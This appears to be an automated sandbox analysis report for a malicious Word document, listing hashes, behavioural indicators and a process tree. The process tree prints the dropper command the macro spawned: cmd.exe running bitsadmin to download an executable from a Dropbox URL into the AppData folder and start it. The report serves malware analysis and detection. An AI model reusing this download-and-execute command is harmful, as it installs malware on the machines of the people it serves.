Analysis
-
max time kernel
125s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
12/06/2024, 10:57
Behavioral task
behavioral1
Sample
a06a124135553e34521dd6d0e991a0a7_JaffaCakes118.doc
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
a06a124135553e34521dd6d0e991a0a7_JaffaCakes118.doc
Resource
win10v2004-20240611-en
General
-
Target
a06a124135553e34521dd6d0e991a0a7_JaffaCakes118.doc
-
Size
109KB
-
MD5
a06a124135553e34521dd6d0e991a0a7
-
SHA1
ad273ad024123d1c29d8197ec1f9b2e6d81efe58
-
SHA256
f5037d0353515ba8c2fff518cb0147d75e305e5c9f113c70b9fc458d11e87a83
-
SHA512
6e7fe6749f3815d06e56191671fa8b05af2240b34091a560f353d12f1347a5bb8593ef6dd7ec7c1f0555d11364c9ceecef3beaedb29d51c08a96419838dcec46
-
SSDEEP
768:smth9cs0k6tWdmUx7mOUPwAy91LSi4TSUaThfFlaKD0xz99G7I:smpokscv7mvPw5qi4TSlThDaKD03s7
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3024 2900 cmd.exe 77 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2964 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2900 WINWORD.EXE 2900 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 2900 WINWORD.EXE 2900 WINWORD.EXE 2900 WINWORD.EXE 2900 WINWORD.EXE 2900 WINWORD.EXE 2900 WINWORD.EXE 2900 WINWORD.EXE 2900 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2900 wrote to memory of 3024 2900 WINWORD.EXE 82 PID 2900 wrote to memory of 3024 2900 WINWORD.EXE 82 PID 3024 wrote to memory of 412 3024 cmd.exe 84 PID 3024 wrote to memory of 412 3024 cmd.exe 84 PID 3024 wrote to memory of 2964 3024 cmd.exe 85 PID 3024 wrote to memory of 2964 3024 cmd.exe 85
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a06a124135553e34521dd6d0e991a0a7_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/5z8un827b89om4g/1qesyozananrivoxityof.exe?dl=1 %appdata%\ikrekh.exe &start %appdata%\ikrekh.exe"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\waitfor.exewaitfor /t 5 YKERQ3⤵PID:412
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/5z8un827b89om4g/1qesyozananrivoxityof.exe?dl=1 C:\Users\Admin\AppData\Roaming\ikrekh.exe3⤵
- Download via BitsAdmin
PID:2964
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810